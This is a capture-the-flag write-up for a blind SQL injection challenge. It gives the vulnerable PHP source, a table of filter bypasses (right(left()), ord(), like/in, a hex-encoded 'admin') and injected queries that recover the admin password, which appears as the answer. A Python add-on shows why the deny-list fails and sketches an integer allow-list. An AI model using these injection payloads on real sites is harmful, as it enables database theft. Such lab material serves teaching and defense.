<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
highlight_file(__FILE__);
?>
Blind SQL Injection challenge
Filtered -> Bypass
substr() -> right(left())
ascii() -> ord()
= -> like, in()
'admin' -> 0x61646d696e
Password length
query : select id from prob_darkknight where id='guest' and pw='123' and no=1 or id in(0x61646d696e) and length(pw) like 8
-> true. The password is 8 characters long.
Each character of the password
query : select id from prob_darkknight where id='guest' and pw='123' and no=1 or id in(0x61646d696e) and ord(right(left(pw,i),1)) > j
-> Run a program that varies i and j to find the answer.
query : select id from prob_darkknight where id='guest' and pw='0b70ea1f' and no=
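Why the deny-list above fails and what a stricter check looks like, as an added example that is not part of the original post: the three preg_match filters are ported to Python and run against the two `no` values from the queries above, next to an integer allow-list. The function names and the assumption that `no` is a plain non-negative integer are mine.

```python
import re

# Deny-list checks ported from the challenge's preg_match calls.
NO_DENY = [re.compile(r"prob|_|\.|\(\)", re.I),
           re.compile(r"'|substr|ascii|=", re.I)]
PW_DENY = [re.compile(r"'", re.I)]

# `no` values taken from the two queries in the write-up (i and j left symbolic).
PAGE_NO_VALUES = [
    "1 or id in(0x61646d696e) and length(pw) like 8",
    "1 or id in(0x61646d696e) and ord(right(left(pw,i),1)) > j",
]

def denylist_allows(pw, no):
    """True when the original filters let the request reach the query."""
    return not (any(p.search(no) for p in NO_DENY)
                or any(p.search(pw) for p in PW_DENY))

def build_query(pw, no):
    """String interpolation as in the challenge's first query."""
    return ("select id from prob_darkknight where id='guest' "
            f"and pw='{pw}' and no={no}")

def allowlist_no(no):
    """Hardened check. Assumption: `no` is a short non-negative decimal integer."""
    # [0-9] with fullmatch: no Unicode digits, no trailing newline, no operators.
    if not re.fullmatch(r"[0-9]{1,9}", no):
        raise ValueError("no must be a decimal integer")
    return int(no)

def audit(pw, values):
    """Return (value, passes_denylist, passes_allowlist) for each input."""
    rows = []
    for no in values:
        try:
            allowlist_no(no)
            ok = True
        except ValueError:
            ok = False
        rows.append((no, denylist_allows(pw, no), ok))
    return rows

if __name__ == "__main__":
    for no, deny_ok, allow_ok in audit("123", PAGE_NO_VALUES + ["1"]):
        print(f"denylist={deny_ok!s:5} allowlist={allow_ok!s:5} {build_query('123', no)}")
```

With `no` validated as an integer and passed as a bound parameter instead of being interpolated, none of the substituted functions or operators reach the SQL parser.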